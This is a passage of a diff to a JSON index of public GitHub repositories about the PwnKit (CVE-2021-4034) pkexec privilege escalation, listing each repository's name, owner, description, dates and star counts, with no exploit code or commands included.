"https:\/\/github.com\/ck00004\/CVE-2021-4034", + "description": "CVE-2021-4034 centos8可用版本", + "fork": false, + "created_at": "2022-02-15T02:34:48Z", + "updated_at": "2024-11-22T12:54:31Z", + "pushed_at": "2022-02-15T02:39:28Z", + "stargazers_count": 28, + "watchers_count": 28, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 28, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 460443117, + "name": "CVE-2021-4034", + "full_name": "LJP-TW\/CVE-2021-4034", + "owner": { + "login": "LJP-TW", + "id": 26863912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26863912?v=4", + "html_url": "https:\/\/github.com\/LJP-TW", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LJP-TW\/CVE-2021-4034", + "description": "pkexec EoP exploit", + "fork": false, + "created_at": "2022-02-17T13:17:07Z", + "updated_at": "2022-02-19T08:00:15Z", + "pushed_at": "2022-02-18T07:31:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 461568164, + "name": "CVE-2021-4034_POC", + "full_name": "fnknda\/CVE-2021-4034_POC", + "owner": { + "login": "fnknda", + "id": 37672942, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37672942?v=4", + "html_url": "https:\/\/github.com\/fnknda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fnknda\/CVE-2021-4034_POC", + "description": "Proof Of Concept for the 2021's pkexec vulnerability CVE-2021-4034", + "fork": false, + "created_at": "2022-02-20T17:49:21Z", + "updated_at": "2022-02-21T12:40:31Z", + "pushed_at": "2022-02-20T17:52:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 461952795, + "name": "CVE-2021-4034", + "full_name": "Tanmay-N\/CVE-2021-4034", + "owner": { + "login": "Tanmay-N", + "id": 36262050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36262050?v=4", + "html_url": "https:\/\/github.com\/Tanmay-N", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Tanmay-N\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-02-21T16:54:38Z", + "updated_at": "2022-02-21T16:57:30Z", + "pushed_at": "2022-02-21T17:06:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 463357145, + "name": "CVE-2021-4034", + "full_name": "hahaleyile\/CVE-2021-4034", + "owner": { + "login": "hahaleyile", + "id": 38727644, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38727644?v=4", + "html_url": "https:\/\/github.com\/hahaleyile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hahaleyile\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-02-25T01:30:09Z", + "updated_at": "2022-06-22T02:55:05Z", + "pushed_at": "2022-02-25T01:30:55Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 464340102, + "name": "PwnKit-CVE-2021-4034", + "full_name": "movvamrocks\/PwnKit-CVE-2021-4034", + "owner": { + "login": "movvamrocks", + "id": 22263143, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22263143?v=4", + "html_url": "https:\/\/github.com\/movvamrocks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/movvamrocks\/PwnKit-CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-02-28T04:41:40Z", + "updated_at": "2022-02-28T04:46:26Z", + "pushed_at": "2022-02-28T04:46:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 465309758, + "name": "CVE-2021-4034", + "full_name": "Squirre17\/CVE-2021-4034", + "owner": { + "login": "Squirre17", + "id": 79578430, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79578430?v=4", + "html_url": "https:\/\/github.com\/Squirre17", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Squirre17\/CVE-2021-4034", + "description": "polkit-pkexec local privilege escalation vulnerability", + "fork": false, + "created_at": "2022-03-02T13:07:00Z", + "updated_at": "2022-03-02T13:18:31Z", + "pushed_at": "2022-03-02T13:19:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465839695, + "name": "make_me_root", + "full_name": "Jesrat\/make_me_root", + "owner": { + "login": "Jesrat", + "id": 18082153, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18082153?v=4", + "html_url": "https:\/\/github.com\/Jesrat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jesrat\/make_me_root", + "description": "CVE-2021-4034", + "fork": false, + "created_at": "2022-03-03T18:29:11Z", + "updated_at": "2022-03-03T19:40:05Z", + "pushed_at": "2022-03-03T19:40:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 465973416, + "name": "cve-2021-4034", + "full_name": "defhacks\/cve-2021-4034", + "owner": { + "login": "defhacks", + "id": 4090053, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4090053?v=4", + "html_url": "https:\/\/github.com\/defhacks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/defhacks\/cve-2021-4034", + "description": "port of CVE-2021-4034 exploit to Rust\/cargo for my own edification", + "fork": false, + "created_at": "2022-03-04T03:47:53Z", + "updated_at": "2022-07-04T19:12:02Z", + "pushed_at": "2022-03-04T05:32:29Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 467844609, + "name": "Polkit-s-Pkexec-CVE-2021-4034", + "full_name": "ITMarcin2211\/Polkit-s-Pkexec-CVE-2021-4034", + "owner": { + "login": "ITMarcin2211", + "id": 60057530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60057530?v=4", + "html_url": "https:\/\/github.com\/ITMarcin2211", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ITMarcin2211\/Polkit-s-Pkexec-CVE-2021-4034", + "description": "Polkit's Pkexec CVE-2021-4034 Proof Of Concept and Patching", + "fork": false, + "created_at": "2022-03-09T08:44:02Z", + "updated_at": "2022-03-09T08:51:49Z", + "pushed_at": "2022-03-09T08:54:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 468150219, + "name": "CVE-2021-4034-Linux", + "full_name": "edsonjt81\/CVE-2021-4034-Linux", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2021-4034-Linux", + "description": null, + "fork": false, + "created_at": "2022-03-10T01:24:14Z", + "updated_at": "2022-03-10T01:24:25Z", + "pushed_at": "2022-03-10T01:24:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469486171, + "name": "pwnkit-vulnerability", + "full_name": "nel0x\/pwnkit-vulnerability", + "owner": { + "login": "nel0x", + "id": 87320197, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87320197?v=4", + "html_url": "https:\/\/github.com\/nel0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nel0x\/pwnkit-vulnerability", + "description": "CVE-2021-4034 (PWNKIT).", + "fork": false, + "created_at": "2022-03-13T20:24:59Z", + "updated_at": "2022-06-06T12:15:58Z", + "pushed_at": "2022-03-13T20:25:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 469927703, + "name": "CVE-2021-4034", + "full_name": "TomSgn\/CVE-2021-4034", + "owner": { + "login": "TomSgn", + "id": 62591045, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62591045?v=4", + "html_url": "https:\/\/github.com\/TomSgn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TomSgn\/CVE-2021-4034", + "description": "pkexec --> privilege escalation", + "fork": false, + "created_at": "2022-03-14T22:42:49Z", + "updated_at": "2022-03-15T00:22:54Z", + "pushed_at": "2022-03-14T22:47:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 470778554, + "name": "CVE-2021-4034", + "full_name": "battleoverflow\/CVE-2021-4034", + "owner": { + "login": "battleoverflow", + "id": 56496067, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56496067?v=4", + "html_url": "https:\/\/github.com\/battleoverflow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/battleoverflow\/CVE-2021-4034", + "description": "CVE-2021-4034", + "fork": false, + "created_at": "2022-03-16T23:05:53Z", + "updated_at": "2024-04-14T16:16:44Z", + "pushed_at": "2024-04-15T05:58:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2021-4034", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 473151472, + "name": "berdav-CVE-2021-4034", + "full_name": "TheJoyOfHacking\/berdav-CVE-2021-4034", + "owner": { + "login": "TheJoyOfHacking", + "id": 99463221, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99463221?v=4", + "html_url": "https:\/\/github.com\/TheJoyOfHacking", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheJoyOfHacking\/berdav-CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-03-23T11:08:20Z", + "updated_at": "2023-10-19T02:17:01Z", + "pushed_at": "2022-03-23T11:08:33Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 474372121, + "name": "CVE-2021-4034", + "full_name": "tzwlhack\/CVE-2021-4034", + "owner": { + "login": "tzwlhack", + "id": 86322859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86322859?v=4", + "html_url": "https:\/\/github.com\/tzwlhack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tzwlhack\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-03-26T14:30:11Z", + "updated_at": "2022-03-26T14:30:22Z", + "pushed_at": "2022-03-26T14:30:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 475232490, + "name": "f_poc_cve-2021-4034", + "full_name": "jcatala\/f_poc_cve-2021-4034", + "owner": { + "login": "jcatala", + "id": 23392306, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23392306?v=4", + "html_url": "https:\/\/github.com\/jcatala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jcatala\/f_poc_cve-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-03-29T01:06:32Z", + "updated_at": "2022-03-31T21:39:25Z", + "pushed_at": "2022-03-30T21:12:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 476850767, + "name": "PwnKit", + "full_name": "Nosferatuvjr\/PwnKit", + "owner": { + "login": "Nosferatuvjr", + "id": 67665267, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67665267?v=4", + "html_url": "https:\/\/github.com\/Nosferatuvjr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nosferatuvjr\/PwnKit", + "description": "Prova de conceito para a vulnerabilidade Polkit Pkexec: CVE-2021-4034(Pkexec Local Privilege Escalation)", + "fork": false, + "created_at": "2022-04-01T19:51:18Z", + "updated_at": "2024-11-09T19:22:42Z", + "pushed_at": "2022-05-27T19:17:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 479489237, + "name": "CVE-2021-4034", + "full_name": "TotallyNotAHaxxer\/CVE-2021-4034", + "owner": { + "login": "TotallyNotAHaxxer", + "id": 87203697, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87203697?v=4", + "html_url": "https:\/\/github.com\/TotallyNotAHaxxer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TotallyNotAHaxxer\/CVE-2021-4034", + "description": "POC for the priv esc exploit in PKEXEC [ CVE -2021-4034 ] ( needs fixing, not the best) Converted into go", + "fork": false, + "created_at": "2022-04-08T17:55:53Z", + "updated_at": "2022-12-06T19:29:30Z", + "pushed_at": "2022-04-08T17:56:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483101688, + "name": "CVE-2021-4034", + "full_name": "rhin0cer0s\/CVE-2021-4034", + "owner": { + "login": "rhin0cer0s", + "id": 1358964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1358964?v=4", + "html_url": "https:\/\/github.com\/rhin0cer0s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rhin0cer0s\/CVE-2021-4034", + "description": "A pkexec CVE-2021-4034 vulnerability exploit", + "fork": false, + "created_at": "2022-04-19T05:01:19Z", + "updated_at": "2022-04-19T05:01:19Z", + "pushed_at": "2022-04-19T05:01:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 483791193, + "name": "CVE-2021-4034-PoC", + "full_name": "0x4ndy\/CVE-2021-4034-PoC", + "owner": { + "login": "0x4ndy", + "id": 40269655, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40269655?v=4", + "html_url": "https:\/\/github.com\/0x4ndy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4ndy\/CVE-2021-4034-PoC", + "description": "CVE-2021-4034 PoC", + "fork": false, + "created_at": "2022-04-20T19:44:03Z", + "updated_at": "2022-04-26T14:47:27Z", + "pushed_at": "2022-04-26T14:34:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 485056122, + "name": "CVE-2021-4034", + "full_name": "antoinenguyen-09\/CVE-2021-4034", + "owner": { + "login": "antoinenguyen-09", + "id": 61876488, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61876488?v=4", + "html_url": "https:\/\/github.com\/antoinenguyen-09", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/antoinenguyen-09\/CVE-2021-4034", + "description": "My research about CVE-2021-4034", + "fork": false, + "created_at": "2022-04-24T14:52:55Z", + "updated_at": "2022-04-28T17:00:09Z", + "pushed_at": "2022-09-18T03:21:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 494691789, + "name": "cve-2021-4034", + "full_name": "wudicainiao\/cve-2021-4034", + "owner": { + "login": "wudicainiao", + "id": 20990570, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20990570?v=4", + "html_url": "https:\/\/github.com\/wudicainiao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wudicainiao\/cve-2021-4034", + "description": "CVE-2021-4034 for single commcand", + "fork": false, + "created_at": "2022-05-21T05:42:01Z", + "updated_at": "2024-10-30T07:16:18Z", + "pushed_at": "2022-05-31T11:56:20Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 499588777, + "name": "CVE-2021-4034", + "full_name": "TanmoyG1800\/CVE-2021-4034", + "owner": { + "login": "TanmoyG1800", + "id": 106038605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106038605?v=4", + "html_url": "https:\/\/github.com\/TanmoyG1800", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TanmoyG1800\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-06-03T17:03:44Z", + "updated_at": "2022-06-03T17:03:44Z", + "pushed_at": "2022-06-03T17:04:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501393521, + "name": "CVE-2021-4034", + "full_name": "CronoX1\/CVE-2021-4034", + "owner": { + "login": "CronoX1", + "id": 91015518, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91015518?v=4", + "html_url": "https:\/\/github.com\/CronoX1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CronoX1\/CVE-2021-4034", + "description": "Exploit modificado para el tito Eu", + "fork": false, + "created_at": "2022-06-08T20:00:39Z", + "updated_at": "2022-06-08T20:01:26Z", + "pushed_at": "2022-06-09T06:16:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 514403582, + "name": "cve-2021-4034", + "full_name": "supportingmx\/cve-2021-4034", + "owner": { + "login": "supportingmx", + "id": 88459207, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88459207?v=4", + "html_url": "https:\/\/github.com\/supportingmx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/supportingmx\/cve-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-07-15T20:58:48Z", + "updated_at": "2024-05-03T00:28:21Z", + "pushed_at": "2024-05-03T00:28:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 519969135, + "name": "CVE-2021-4034", + "full_name": "A1vinSmith\/CVE-2021-4034", + "owner": { + "login": "A1vinSmith", + "id": 24937594, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24937594?v=4", + "html_url": "https:\/\/github.com\/A1vinSmith", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/A1vinSmith\/CVE-2021-4034", + "description": "Script en python sobre la vulnerabilidad CVE-2021-4034", + "fork": false, + "created_at": "2022-08-01T04:59:02Z", + "updated_at": "2024-04-26T08:33:31Z", + "pushed_at": "2022-11-02T22:24:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 522703423, + "name": "pwnkit", + "full_name": "HellGateCorp\/pwnkit", + "owner": { + "login": "HellGateCorp", + "id": 83019866, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83019866?v=4", + "html_url": "https:\/\/github.com\/HellGateCorp", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HellGateCorp\/pwnkit", + "description": "PoC for CVE-2021-4034.", + "fork": false, + "created_at": "2022-08-08T20:51:01Z", + "updated_at": "2023-01-04T15:15:20Z", + "pushed_at": "2022-08-08T18:50:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 523748195, + "name": "cve-2021-4034", + "full_name": "Silencecyber\/cve-2021-4034", + "owner": { + "login": "Silencecyber", + "id": 96882434, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96882434?v=4", + "html_url": "https:\/\/github.com\/Silencecyber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Silencecyber\/cve-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-08-11T14:10:39Z", + "updated_at": "2022-08-11T14:20:30Z", + "pushed_at": "2022-08-11T14:20:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 524718477, + "name": "cve-2021-4034-poc", + "full_name": "Geni0r\/cve-2021-4034-poc", + "owner": { + "login": "Geni0r", + "id": 50078493, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50078493?v=4", + "html_url": "https:\/\/github.com\/Geni0r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Geni0r\/cve-2021-4034-poc", + "description": null, + "fork": false, + "created_at": "2022-08-14T16:07:29Z", + "updated_at": "2022-08-14T16:08:20Z", + "pushed_at": "2022-08-14T16:08:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 533483884, + "name": "CVE-2021-4034", + "full_name": "zxc2007\/CVE-2021-4034", + "owner": { + "login": "zxc2007", + "id": 33582901, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33582901?v=4", + "html_url": "https:\/\/github.com\/zxc2007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zxc2007\/CVE-2021-4034", + "description": "pwnkit auto exploiter written in Go, no network connectivity required.", + "fork": false, + "created_at": "2022-09-06T20:00:58Z", + "updated_at": "2023-03-09T07:28:13Z", + "pushed_at": "2022-09-06T17:15:13Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 549250097, + "name": "CVE-2021-4034", + "full_name": "Pixailz\/CVE-2021-4034", + "owner": { + "login": "Pixailz", + "id": 35565530, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35565530?v=4", + "html_url": "https:\/\/github.com\/Pixailz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pixailz\/CVE-2021-4034", + "description": "polkit priv esc: pkexec out of boundary exploit", + "fork": false, + "created_at": "2022-10-10T22:56:09Z", + "updated_at": "2023-05-05T16:12:11Z", + "pushed_at": "2022-10-11T00:40:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 554386802, + "name": "CVE-2021-4034", + "full_name": "toecesws\/CVE-2021-4034", + "owner": { + "login": "toecesws", + "id": 92218609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92218609?v=4", + "html_url": "https:\/\/github.com\/toecesws", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/toecesws\/CVE-2021-4034", + "description": "Vulnerability to CVE-2021-4034 Pwnkit", + "fork": false, + "created_at": "2022-10-19T18:19:58Z", + "updated_at": "2022-10-02T04:30:48Z", + "pushed_at": "2022-09-25T02:47:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 559639297, + "name": "CVE-2021-4034-pwnkit", + "full_name": "jehovah2002\/CVE-2021-4034-pwnkit", + "owner": { + "login": "jehovah2002", + "id": 25336416, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25336416?v=4", + "html_url": "https:\/\/github.com\/jehovah2002", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jehovah2002\/CVE-2021-4034-pwnkit", + "description": null, + "fork": false, + "created_at": "2022-10-30T18:24:39Z", + "updated_at": "2022-11-01T07:21:49Z", + "pushed_at": "2022-10-30T18:24:39Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 571979892, + "name": "CVE-2021-4034", + "full_name": "fei9747\/CVE-2021-4034", + "owner": { + "login": "fei9747", + "id": 37730810, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37730810?v=4", + "html_url": "https:\/\/github.com\/fei9747", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fei9747\/CVE-2021-4034", + "description": null, + "fork": false, + "created_at": "2022-11-29T09:55:49Z", + "updated_at": "2022-11-29T09:56:08Z", + "pushed_at": "2022-11-29T09:56:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 585200595, + "name": "pwnkit", + "full_name": "pyhrr0\/pwnkit", + "owner": { + "login": "pyhrr0", + "id": 5622198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5622198?v=4", + "html_url": "https:\/\/github.com\/pyhrr0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pyhrr0\/pwnkit", + "description": "CVE-2021-4034 PoC", + "fork": false, + "created_at": "2023-01-04T15:15:31Z", + "updated_at": "2023-01-04T15:30:56Z", + "pushed_at": "2023-01-04T15:15:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + 